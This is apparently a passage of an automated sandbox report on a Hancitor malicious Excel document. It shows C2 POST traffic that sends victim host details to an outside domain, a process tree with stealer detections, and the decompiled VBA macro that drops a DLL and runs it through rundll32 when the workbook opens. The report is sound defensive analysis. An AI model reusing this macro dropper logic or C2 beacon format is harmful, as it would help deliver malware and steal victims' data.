                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:53.214713097 CEST405INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:53 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 41 5a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFAZUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                99192.168.2.2249266194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:53.486310005 CEST406OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:53.658466101 CEST406INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:53 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMZANARRABw==0


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                Analysis Process: EXCEL.EXE PID: 2404 Parent PID: 584

                                                General

                                                Start time:16:10:37
                                                Start date:22/07/2021
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                Imagebase:0x13f450000
                                                File size:27641504 bytes
                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: imjppdmg.exe PID: 1360 Parent PID: 2404

                                                General

                                                Start time:16:10:38
                                                Start date:22/07/2021
                                                Path:C:\Windows\System32\IME\IMEJP10\imjppdmg.exe
                                                Wow64 process (32bit):false
                                                Commandline:/Migration
                                                Imagebase:0xffdb0000
                                                File size:30208 bytes
                                                MD5 hash:3716DEC1E0B88BB19968BBC2659B02A1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 2384 Parent PID: 2404

                                                General

                                                Start time:16:10:41
                                                Start date:22/07/2021
                                                Path:C:\Windows\System32\rundll32.exe
                                                Wow64 process (32bit):false
                                                Commandline:'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                                                Imagebase:0xff020000
                                                File size:45568 bytes
                                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: rundll32.exe PID: 2364 Parent PID: 2384

                                                General

                                                Start time:16:10:41
                                                Start date:22/07/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                                                Imagebase:0xb60000
                                                File size:44544 bytes
                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp, Author: Joe Security
                                                Reputation:high

                                                Chronological Activities

                                                Analysis Process: svchost.exe PID: 2292 Parent PID: 2364

                                                General

                                                Start time:16:10:59
                                                Start date:22/07/2021
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\System32\svchost.exe
                                                Imagebase:0xb30000
                                                File size:20992 bytes
                                                MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Ficker_Stealer_1, Description: Yara detected Ficker Stealer, Source: 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmp, Author: Joe Security
                                                Reputation:moderate

                                                Chronological Activities

                                                Disassembly

                                                Code Analysis

                                                VBA Code

                                                Call Graph

                                                Graph

                                                • Entrypoint
                                                • Decryption Function
                                                • Executed
                                                • Not Executed
                                                • Show Help
                                                callgraph 2 nam 15 Search Name:1,Clear:1 15->15 96 Workbook_Open Len:1,vbNullString:2,Select:1,Dir:1 96->2 181 xxx 96->181 181->15

                                                Module: Module1

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "Module1"

                                                Executed Functions
                                                Subroutine nam, APIs: 1, Strings: 1, Number of lines: 3, Relevance: 5.253
                                                APIsMeta Information

                                                Environ$

                                                StringsDecrypted Strings
                                                "temp"
                                                LineInstructionMeta Information
                                                3

                                                Sub nam(pafs as String)

                                                4

                                                Name pafs As Environ$("temp") & "\" & "omsh.dll"

                                                Environ$

                                                executed
                                                5

                                                End Sub

                                                Subroutine Search, APIs: 8, Strings: 2, Number of lines: 15, Relevance: 15.015
                                                APIsMeta Information

                                                SubFolders

                                                Part of subcall function Search@Module1: SubFolders

                                                Part of subcall function Search@Module1: Files

                                                Part of subcall function Search@Module1: Name

                                                Part of subcall function Search@Module1: Clear

                                                Files

                                                Name

                                                Clear

                                                StringsDecrypted Strings
                                                "532.dll"
                                                "532.dll"
                                                LineInstructionMeta Information
                                                10

                                                Sub Search(mds as Object, pafs as String)

                                                11

                                                Dim Nedc as Object

                                                executed
                                                14

                                                For Each Nedc in mds.SubFolders

                                                SubFolders

                                                SubFolders

                                                15

                                                Search Nedc, pafs

                                                16

                                                Next Nedc

                                                SubFolders

                                                SubFolders

                                                17

                                                Dim Ters as Object

                                                18

                                                For Each Ters in mds.Files

                                                Files

                                                Files

                                                20

                                                If Ters.Name = "532.dll" Then

                                                Name

                                                Name

                                                22

                                                pafs = Ters

                                                23

                                                Endif

                                                24

                                                Next Ters

                                                Files

                                                Files

                                                25

                                                Exit Sub

                                                25

                                                ErrHandle:

                                                28

                                                Err.Clear

                                                Clear

                                                Clear

                                                29

                                                End Sub

                                                Module: Sheet1

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "Sheet1"

                                                2

                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                Module: ThisWorkbook

                                                Declaration
                                                LineContent
                                                1

                                                Attribute VB_Name = "ThisWorkbook"

                                                2

                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                3

                                                Attribute VB_GlobalNameSpace = False

                                                4

                                                Attribute VB_Creatable = False

                                                5

                                                Attribute VB_PredeclaredId = True

                                                6

                                                Attribute VB_Exposed = True

                                                7

                                                Attribute VB_TemplateDerived = False

                                                8

                                                Attribute VB_Customizable = True

                                                9

                                                Option Compare Text

                                                10

                                                Option Explicit

                                                11

                                                Dim Ioes as String

                                                12

                                                Private Declare PtrSafe Function fffz Lib "shell32" Alias "ShellExecuteA"(ByVal hwnd as Long, ByVal lpOperation as String, ByVal lpFile as String, ByVal lpParameters as String, ByVal lpDirectory as String, ByVal nShowCmd as Long) as Long

                                                Executed Functions
                                                Subroutine Workbook_Open, APIs: 11, Strings: 14, Number of lines: 17, Relevance: 66.017
                                                APIsMeta Information

                                                Environ$

                                                Dir

                                                Select

                                                Copy

                                                Part of subcall function xxx@ThisWorkbook: Environ$

                                                Part of subcall function xxx@ThisWorkbook: GetFolder

                                                Len

                                                		Len("C:\Users\Albus\AppData\Local\Temp\532.dll") -> 41

                                                Part of subcall function nam@Module1: Environ$

                                                shell32!ShellExecuteA

                                                		shell32!ShellExecuteA(0,"","rundll32","C:\Users\Albus\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB","",1)

                                                vbNullString

                                                Environ$

                                                StringsDecrypted Strings
                                                "temp"
                                                "texmp"
                                                """"
                                                ".exe"
                                                "Object 20"
                                                "rundl""l32"
                                                "temp"
                                                "Object 20"
                                                ".exe"
                                                "rundl""l32"
                                                "temp"
                                                ".exe"
                                                "rundl""l32"
                                                "temp"
                                                LineInstructionMeta Information
                                                17

                                                Private Sub Workbook_Open()

                                                21

                                                Dim vcbc as String

                                                executed
                                                22

                                                vcbc = Environ$("temp")

                                                Environ$

                                                23

                                                Dim xc

                                                24

                                                xc = "texmp"

                                                25

                                                If Dir(vcbc & "\omsh.dll") = "" Then

                                                Dir

                                                27

                                                ActiveSheet.Shapes.Range(Array("Object 20")).Select

                                                Select

                                                28

                                                Selection.Copy

                                                Copy

                                                31

                                                Call xxx()

                                                33

                                                If Len(Ioes) > 2 Then

                                                Len("C:\Users\Albus\AppData\Local\Temp\532.dll") -> 41

                                                executed
                                                35

                                                Call nam(Ioes)

                                                37

                                                Dim ued as String

                                                38

                                                ued = ".exe"

                                                41

                                                fffz 0, vbNullString, "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB", vbNullString, 1

                                                shell32!ShellExecuteA(0,"","rundll32","C:\Users\Albus\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB","",1)

                                                vbNullString

                                                Environ$

                                                executed
                                                44

                                                Endif

                                                45

                                                Endif

                                                46

                                                End Sub

                                                Subroutine xxx, APIs: 6, Strings: 1, Number of lines: 7, Relevance: 14.007
                                                APIsMeta Information

                                                Environ$

                                                Part of subcall function Search@Module1: SubFolders

                                                Part of subcall function Search@Module1: Files

                                                Part of subcall function Search@Module1: Name

                                                Part of subcall function Search@Module1: Clear

                                                GetFolder

                                                StringsDecrypted Strings
                                                "temp"
                                                LineInstructionMeta Information
                                                49

                                                Sub xxx()

                                                50

                                                Dim usx

                                                executed
                                                52

                                                usx = Environ$("temp")

                                                Environ$

                                                55

                                                Dim asdaf as FileSystemObject

                                                57

                                                Set asdaf = New Scripting.FileSystemObject

                                                60

                                                Call Search(asdaf.GetFolder(usx), Ioes)

                                                GetFolder

                                                62

                                                End Sub

                                                Reset < >

                                                  Analysis Process: rundll32.exe PID: 2364 Parent PID: 2384 rundll32.exeCOMMON

                                                  Execution Graph

                                                  Execution Coverage:7.9%
                                                  Dynamic/Decrypted Code Coverage:77.6%
                                                  Signature Coverage:10.5%
                                                  Total number of Nodes:1155
                                                  Total number of Limit Nodes:11

                                                  Graph

                                                  execution_graph 8727 36e520 8729 36e529 8727->8729 8730 36e54b 8729->8730 8732 36ead1 8730->8732 8733 36eb16 8732->8733 8734 36ebb2 VirtualAlloc 8733->8734 8735 36eb74 VirtualAlloc 8733->8735 8736 36ebf8 8734->8736 8735->8734 8737 36ec11 VirtualAlloc 8736->8737 8752 36e780 8737->8752 8740 36ec7a 8741 36ed4b VirtualProtect 8740->8741 8742 36ed6a 8741->8742 8744 36ed9d 8741->8744 8743 36ed78 VirtualProtect 8742->8743 8742->8744 8743->8742 8745 36ee1f VirtualProtect 8744->8745 8746 36ee5a VirtualProtect 8745->8746 8748 36eeb7 VirtualFree GetPEB 8746->8748 8749 36eee3 8748->8749 8754 36ea00 GetPEB 8749->8754 8751 36ef27 8753 36e78f VirtualFree 8752->8753 8753->8740 8755 36ea30 8754->8755 8755->8751 8756 34c12e 8757 34c135 8756->8757 8758 34c13a 8756->8758 8770 351e79 8757->8770 8762 34c038 8758->8762 8761 34c14b 8763 34c044 ___DllMainCRTStartup 8762->8763 8765 34c0e1 ___DllMainCRTStartup 8763->8765 8766 34c091 8763->8766 8774 34be5f 8763->8774 8765->8761 8766->8765 8768 34be5f __CRT_INIT@12 95 API calls 8766->8768 8769 34c0c1 8766->8769 8767 34be5f __CRT_INIT@12 95 API calls 8767->8765 8768->8769 8769->8765 8769->8767 8771 351e9c 8770->8771 8772 351ea9 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 8770->8772 8771->8772 8773 351ea0 8771->8773 8772->8773 8773->8758 8775 34be72 RtlAllocateHeap 8774->8775 8776 34bf89 8774->8776 8784 34be96 8775->8784 8789 34be8f 8775->8789 8777 34bfc4 8776->8777 8778 34bf8f 8776->8778 8779 34c022 8777->8779 8780 34bfc9 8777->8780 8783 34bfae 8778->8783 8778->8789 8960 3516c1 8778->8960 8779->8789 9000 34ebd4 8779->9000 8963 34e8fd TlsGetValue 8780->8963 8788 3506c5 __ioterm 42 API calls 8783->8788 8783->8789 8792 34bea6 HeapFree 8784->8792 8793 34beb1 HeapFree 8784->8793 8791 34bfb8 8788->8791 8789->8766 8795 34e927 __mtterm 42 API calls 8791->8795 8792->8789 8802 34bedd 8793->8802 8797 34bfbd 8795->8797 8796 34bfe6 8974 34e891 8796->8974 8801 351c7a __heap_term 2 API calls 8797->8801 8801->8789 8832 351c20 HeapCreate 8802->8832 8805 34bf13 8805->8789 8841 34ec3d GetModuleHandleA 8805->8841 8806 34c016 8987 34c707 8806->8987 8807 34bfff 8978 34e964 8807->8978 8811 34c006 GetCurrentThreadId 8811->8789 8812 34bf77 8812->8789 8813 34bf21 __RTC_Initialize 8814 34bf25 8813->8814 8816 34bf34 GetCommandLineA 8813->8816 8911 351c7a 8814->8911 8873 351a48 8816->8873 8820 34bf4e 8821 34bf52 8820->8821 8822 34bf59 8820->8822 8916 34e927 8821->8916 8924 35198f 8822->8924 8826 34bf72 8826->8812 8955 3506c5 8826->8955 8833 351c40 8832->8833 8834 351c43 8832->8834 8833->8805 9008 351bc5 8834->9008 8836 351c76 8836->8805 8840 351c61 HeapDestroy 8840->8833 8842 34ec4f 8841->8842 8845 34ec58 TlsAlloc 8841->8845 8843 34e927 __mtterm 42 API calls 8842->8843 8844 34ec54 8843->8844 8844->8813 8847 34ecf0 8845->8847 8848 34edbc 8845->8848 8847->8848 9072 3516d0 8847->9072 8848->8813 8853 34e825 __encode_pointer 2 API calls 8854 34ed21 8853->8854 8855 34e825 __encode_pointer 2 API calls 8854->8855 8856 34ed31 8855->8856 8857 34e825 __encode_pointer 2 API calls 8856->8857 8858 34ed41 8857->8858 9086 352dcc 8858->9086 8861 34edb7 8863 34e927 __mtterm 42 API calls 8861->8863 8862 34ed52 8864 34e891 __decode_pointer GetModuleHandleA 8862->8864 8863->8848 8865 34ed62 8864->8865 8865->8861 8866 34ffb0 __calloc_crt 41 API calls 8865->8866 8867 34ed7b 8866->8867 8867->8861 8868 34e891 __decode_pointer GetModuleHandleA 8867->8868 8869 34ed95 8868->8869 8869->8861 8870 34ed9c 8869->8870 8871 34e964 __CRT_INIT@12 41 API calls 8870->8871 8872 34eda4 GetCurrentThreadId 8871->8872 8872->8848 8874 351a64 8873->8874 8875 351a83 8873->8875 8877 351a6c 8874->8877 8880 351a78 GetLastError 8874->8880 8876 351b1e 8875->8876 8875->8877 8878 351b26 GetEnvironmentStrings 8876->8878 8879 34bf44 8876->8879 8877->8879 8884 351ae1 8877->8884 8885 351b13 FreeEnvironmentStringsW 8877->8885 8878->8879 8882 351b36 8878->8882 8894 350485 8879->8894 8880->8875 8883 34ff70 __malloc_crt 41 API calls 8882->8883 8886 351b4f 8883->8886 9108 34ff70 8884->9108 8885->8879 8888 351b56 FreeEnvironmentStringsA 8886->8888 8889 351b62 8886->8889 8888->8879 8890 351b6a FreeEnvironmentStringsA 8889->8890 8890->8879 8892 351b0a 8892->8885 8893 34c707 __crtGetStringTypeA_stat 41 API calls 8893->8892 9322 34dfa0 8894->9322 8896 350491 GetStartupInfoA 8897 34ffb0 __calloc_crt 41 API calls 8896->8897 8903 3504b2 8897->8903 8898 3506bc ___DllMainCRTStartup 8898->8820 8899 350639 GetStdHandle 8905 350603 8899->8905 8900 34ffb0 __calloc_crt 41 API calls 8900->8903 8901 35069e SetHandleCount 8901->8898 8902 35064b GetFileType 8902->8905 8903->8898 8903->8900 8904 350586 8903->8904 8903->8905 8904->8905 8906 3505af GetFileType 8904->8906 8907 3505ba 8904->8907 8905->8899 8905->8901 8905->8902 8910 350662 8905->8910 8906->8904 8906->8907 8907->8898 8907->8904 8909 35577b ___crtInitCritSecAndSpinCount 41 API calls 8907->8909 8908 35577b ___crtInitCritSecAndSpinCount 41 API calls 8908->8910 8909->8907 8910->8898 8910->8905 8910->8908 8912 351c86 8911->8912 8913 351cda HeapDestroy 8911->8913 8914 351ca2 VirtualFree 8912->8914 8915 351cc8 8912->8915 8913->8789 8914->8912 8915->8913 8917 34e931 8916->8917 8920 34e93d 8916->8920 8918 34e891 __decode_pointer GetModuleHandleA 8917->8918 8918->8920 8919 34e951 TlsFree 8921 34e95f 8919->8921 8920->8919 8920->8921 8922 34c707 __crtGetStringTypeA_stat 41 API calls 8921->8922 8923 352e47 8921->8923 8922->8921 8923->8814 8925 3519a7 GetModuleFileNameA 8924->8925 8926 3519a2 8924->8926 8928 3519ce 8925->8928 9323 34e807 8926->9323 9327 3517f7 8928->9327 8930 34bf5e 8930->8826 8935 35171c 8930->8935 8932 34ff70 __malloc_crt 41 API calls 8933 351a10 8932->8933 8933->8930 8934 3517f7 _parse_cmdline 43 API calls 8933->8934 8934->8930 8936 351729 8935->8936 8939 35172e _strlen 8935->8939 8937 34e807 ___initmbctable 60 API calls 8936->8937 8937->8939 8938 34ffb0 __calloc_crt 41 API calls 8947 351761 _strlen 8938->8947 8939->8938 8942 34bf67 8939->8942 8940 3517bc 8941 34c707 __crtGetStringTypeA_stat 41 API calls 8940->8941 8941->8942 8942->8826 8949 351550 8942->8949 8943 34ffb0 __calloc_crt 41 API calls 8943->8947 8944 3517e1 8945 34c707 __crtGetStringTypeA_stat 41 API calls 8944->8945 8945->8942 8946 34d1ae _strcpy_s 41 API calls 8946->8947 8947->8940 8947->8942 8947->8943 8947->8944 8947->8946 8948 34d00f __invoke_watson 10 API calls 8947->8948 8948->8947 8950 351559 __except_handler4 8949->8950 9573 3549fd 8950->9573 8952 351578 __initterm_e 8954 351599 __except_handler4 8952->8954 9577 34c267 8952->9577 8954->8826 8959 3506cc 8955->8959 8956 34bf87 8956->8821 8957 3506e0 RtlDeleteCriticalSection 8957->8959 8958 34c707 __crtGetStringTypeA_stat 41 API calls 8958->8959 8959->8956 8959->8957 8959->8958 9675 3515e2 8960->9675 8962 3516cc 8962->8783 8964 34bfce 8963->8964 8965 34e90d 8963->8965 8968 34ffb0 8964->8968 8966 34e891 __decode_pointer GetModuleHandleA 8965->8966 8967 34e918 TlsSetValue 8966->8967 8967->8964 8971 34ffb4 8968->8971 8970 34bfda 8970->8789 8970->8796 8971->8970 8972 34ffd4 Sleep 8971->8972 9695 3552fb 8971->9695 8973 34ffe9 8972->8973 8973->8970 8973->8971 8976 34e8a0 8974->8976 8975 34e8c5 GetModuleHandleA 8977 34bff8 8975->8977 8976->8975 8976->8977 8977->8806 8977->8807 9712 34dfa0 8978->9712 8980 34e970 GetModuleHandleA 8981 34e9b6 InterlockedIncrement 8980->8981 8982 34e992 8980->8982 8983 352f42 __lock 39 API calls 8981->8983 8982->8981 8984 34e9dd ___addlocaleref 8983->8984 9713 34ea0f 8984->9713 8986 34ea09 ___DllMainCRTStartup 8986->8811 8989 34c713 ___DllMainCRTStartup 8987->8989 8988 34c752 8990 34c767 HeapFree 8988->8990 8992 34c78c _realloc ___DllMainCRTStartup 8988->8992 8989->8988 8991 352f42 __lock 39 API calls 8989->8991 8989->8992 8990->8992 8993 34c779 8990->8993 8996 34c72a ___sbh_find_block 8991->8996 8992->8812 8994 34d16a _wcsftime_l_stat 39 API calls 8993->8994 8995 34c77e GetLastError 8994->8995 8995->8992 8999 34c744 8996->8999 9717 352fe6 8996->9717 9721 34c75d 8999->9721 9001 34ebdd 9000->9001 9007 34ec28 9000->9007 9004 34e891 __decode_pointer GetModuleHandleA 9001->9004 9002 34ec33 TlsSetValue 9003 34ec3c 9002->9003 9003->8789 9005 34ec1f 9004->9005 9725 34eab3 9005->9725 9007->9002 9007->9003 9019 3514dd 9008->9019 9011 351beb 9033 351514 9011->9033 9014 351bf7 9015 34d00f __invoke_watson 10 API calls 9014->9015 9016 351c06 9014->9016 9015->9016 9016->8836 9017 352f73 RtlAllocateHeap 9016->9017 9018 351c5c 9017->9018 9018->8836 9018->8840 9020 3514e8 9019->9020 9022 35150e 9020->9022 9040 34d16a 9020->9040 9022->9011 9026 34d00f 9022->9026 9061 3500a0 9026->9061 9028 34d0a0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9029 34d0d7 _abort 9028->9029 9030 34d0e3 GetCurrentProcess TerminateProcess 9028->9030 9029->9030 9063 34b083 9030->9063 9032 34d103 9032->9011 9034 35151f 9033->9034 9035 34d16a _wcsftime_l_stat 41 API calls 9034->9035 9036 351544 9034->9036 9037 351524 9035->9037 9036->9014 9038 34d10b _wcsftime_l_stat GetModuleHandleA 9037->9038 9039 351534 9038->9039 9039->9014 9046 34ea18 GetLastError 9040->9046 9042 34d16f 9043 34d10b 9042->9043 9044 34e891 __decode_pointer GetModuleHandleA 9043->9044 9045 34d119 _abort 9044->9045 9047 34e8fd ___set_flsgetvalue 3 API calls 9046->9047 9048 34ea27 TlsGetValue 9047->9048 9049 34ea3b 9048->9049 9050 34ea8f SetLastError 9049->9050 9051 34ffb0 __calloc_crt 37 API calls 9049->9051 9050->9042 9052 34ea4d 9051->9052 9052->9050 9053 34e891 __decode_pointer GetModuleHandleA 9052->9053 9054 34ea67 9053->9054 9055 34ea86 9054->9055 9056 34ea6e 9054->9056 9058 34c707 __crtGetStringTypeA_stat 37 API calls 9055->9058 9057 34e964 __CRT_INIT@12 37 API calls 9056->9057 9059 34ea76 GetCurrentThreadId 9057->9059 9060 34ea8c 9058->9060 9059->9050 9060->9050 9062 3500ac __VEC_memzero 9061->9062 9062->9028 9064 34b08d IsDebuggerPresent 9063->9064 9065 34b08b 9063->9065 9071 354493 9064->9071 9065->9032 9068 34cc59 SetUnhandledExceptionFilter UnhandledExceptionFilter 9069 34cc76 _abort 9068->9069 9070 34cc7e GetCurrentProcess TerminateProcess 9068->9070 9069->9070 9070->9032 9071->9068 9090 34e888 9072->9090 9074 3516d6 __init_pointers 9093 352d6e 9074->9093 9077 34e825 __encode_pointer 2 API calls 9078 34ed06 9077->9078 9079 34e825 9078->9079 9083 34e834 9079->9083 9080 34e859 GetModuleHandleA 9081 34e882 9080->9081 9082 34e868 9080->9082 9081->8853 9084 34e851 9082->9084 9083->9080 9083->9084 9084->9081 9085 34e878 RtlEncodePointer 9084->9085 9085->9081 9089 352dd5 9086->9089 9088 34ed4e 9088->8861 9088->8862 9089->9088 9096 35577b 9089->9096 9091 34e825 __encode_pointer 2 API calls 9090->9091 9092 34e88f 9091->9092 9092->9074 9094 34e825 __encode_pointer 2 API calls 9093->9094 9095 351708 9094->9095 9095->9077 9097 355787 ___DllMainCRTStartup 9096->9097 9098 34e891 __decode_pointer GetModuleHandleA 9097->9098 9099 355797 9098->9099 9100 3514dd ___crtMessageBoxA 40 API calls 9099->9100 9106 3557eb ___DllMainCRTStartup 9099->9106 9101 3557a7 9100->9101 9102 3557b6 9101->9102 9103 34d00f __invoke_watson 10 API calls 9101->9103 9104 3557ce 9102->9104 9105 3557bf GetModuleHandleA 9102->9105 9103->9102 9107 34e825 __encode_pointer 2 API calls 9104->9107 9105->9104 9106->9089 9107->9106 9112 34ff74 9108->9112 9110 34ffab 9110->8885 9110->8892 9110->8893 9111 34ff8c Sleep 9111->9112 9112->9110 9112->9111 9113 34d262 9112->9113 9114 34d30f 9113->9114 9124 34d270 9113->9124 9115 351412 _realloc GetModuleHandleA 9114->9115 9116 34d315 9115->9116 9117 34d16a _wcsftime_l_stat 41 API calls 9116->9117 9119 34d31b 9117->9119 9119->9112 9123 34d306 9123->9112 9124->9123 9125 34d2fa 9124->9125 9128 34d2f8 9124->9128 9130 35445a 9124->9130 9139 3542ba 9124->9139 9173 35147e 9124->9173 9176 34d213 9124->9176 9184 351412 9124->9184 9127 34d16a _wcsftime_l_stat 41 API calls 9125->9127 9127->9128 9129 34d16a _wcsftime_l_stat 41 API calls 9128->9129 9129->9123 9187 3561aa 9130->9187 9132 354461 9133 35446e 9132->9133 9134 3561aa __FF_MSGBANNER 41 API calls 9132->9134 9135 3542ba __NMSG_WRITE 41 API calls 9133->9135 9137 354490 9133->9137 9134->9133 9136 354486 9135->9136 9138 3542ba __NMSG_WRITE 41 API calls 9136->9138 9137->9124 9138->9137 9140 3542c6 9139->9140 9141 3561aa __FF_MSGBANNER 38 API calls 9140->9141 9172 35441c 9140->9172 9142 3542e6 9141->9142 9143 354421 GetStdHandle 9142->9143 9145 3561aa __FF_MSGBANNER 38 API calls 9142->9145 9144 35442f _strlen 9143->9144 9143->9172 9148 354449 WriteFile 9144->9148 9144->9172 9146 3542f7 9145->9146 9146->9143 9147 354309 9146->9147 9147->9172 9194 34d1ae 9147->9194 9148->9172 9151 35433f GetModuleFileNameA 9153 35435d 9151->9153 9157 354380 _strlen 9151->9157 9152 34d00f __invoke_watson 10 API calls 9154 35433c 9152->9154 9155 34d1ae _strcpy_s 38 API calls 9153->9155 9154->9151 9156 35436d 9155->9156 9156->9157 9159 34d00f __invoke_watson 10 API calls 9156->9159 9158 3543c3 9157->9158 9203 353db6 9157->9203 9212 353cf1 9158->9212 9159->9157 9164 3543e7 9166 353cf1 _strcat_s 38 API calls 9164->9166 9165 34d00f __invoke_watson 10 API calls 9165->9164 9168 3543f8 9166->9168 9167 34d00f __invoke_watson 10 API calls 9167->9158 9169 354409 9168->9169 9170 34d00f __invoke_watson 10 API calls 9168->9170 9221 35600c 9169->9221 9170->9169 9172->9124 9255 351458 GetModuleHandleA 9173->9255 9177 34d21f ___DllMainCRTStartup 9176->9177 9178 34d250 ___DllMainCRTStartup 9177->9178 9257 352f42 9177->9257 9178->9124 9180 34d235 9264 35378f 9180->9264 9185 34e891 __decode_pointer GetModuleHandleA 9184->9185 9186 35141d 9185->9186 9186->9124 9188 3561b5 9187->9188 9189 3561bf 9188->9189 9190 34d16a _wcsftime_l_stat 41 API calls 9188->9190 9189->9132 9191 3561d8 9190->9191 9192 34d10b _wcsftime_l_stat GetModuleHandleA 9191->9192 9193 3561e8 9192->9193 9193->9132 9195 34d1c3 9194->9195 9196 34d1bb 9194->9196 9197 34d16a _wcsftime_l_stat 41 API calls 9195->9197 9196->9195 9198 34d1ea 9196->9198 9202 34d1c8 9197->9202 9200 34d1d7 9198->9200 9201 34d16a _wcsftime_l_stat 41 API calls 9198->9201 9199 34d10b _wcsftime_l_stat GetModuleHandleA 9199->9200 9200->9151 9200->9152 9201->9202 9202->9199 9208 353dc6 9203->9208 9204 353dca 9205 34d16a _wcsftime_l_stat 41 API calls 9204->9205 9206 353dcf 9204->9206 9207 353de6 9205->9207 9206->9158 9206->9167 9209 34d10b _wcsftime_l_stat GetModuleHandleA 9207->9209 9208->9204 9208->9206 9210 353e10 9208->9210 9209->9206 9210->9206 9211 34d16a _wcsftime_l_stat 41 API calls 9210->9211 9211->9207 9213 353d06 9212->9213 9216 353cfe 9212->9216 9214 34d16a _wcsftime_l_stat 41 API calls 9213->9214 9215 353d0b 9214->9215 9217 34d10b _wcsftime_l_stat GetModuleHandleA 9215->9217 9216->9213 9219 353d3b 9216->9219 9218 353d1a 9217->9218 9218->9164 9218->9165 9219->9218 9220 34d16a _wcsftime_l_stat 41 API calls 